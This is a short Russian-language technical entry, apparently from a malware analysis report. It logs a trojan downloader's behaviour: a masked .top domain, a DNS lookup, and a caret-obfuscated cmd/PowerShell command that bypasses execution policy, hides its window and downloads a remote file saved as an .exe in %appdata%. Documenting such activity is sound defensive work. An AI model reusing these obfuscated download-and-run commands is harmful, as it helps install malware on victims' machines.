Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^W^eRSHElL.^e^X^e^ -^Ex^Ec^UTIoNPOL^iCy^ ^By^pAs^s^ ^-^no^p^rOF^I^le^ -w^in^D^ow^Style Hi^DD^E^n ^(nEw-^O^bjEc^T ^S^yst^e^M.NET.wE^bClI^Ent).^d^O^WNLO^aDfI^l^e('http://ho##...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "p^o^W^eRSHElL.^e^X^e^ -^Ex^Ec^UTIoNPOL^iCy^ ^By^pAs^s^ ^-^no^p^rOF^I^le^ -w^in^D^ow^Style Hi^DD^E^n ^(nEw-^O^bjEc^T ^S^yst^e^M.NET.wE^bClI^Ent).^d^O^WNLO^aDfI^l^e('http://ho##...' (со скрытым окном)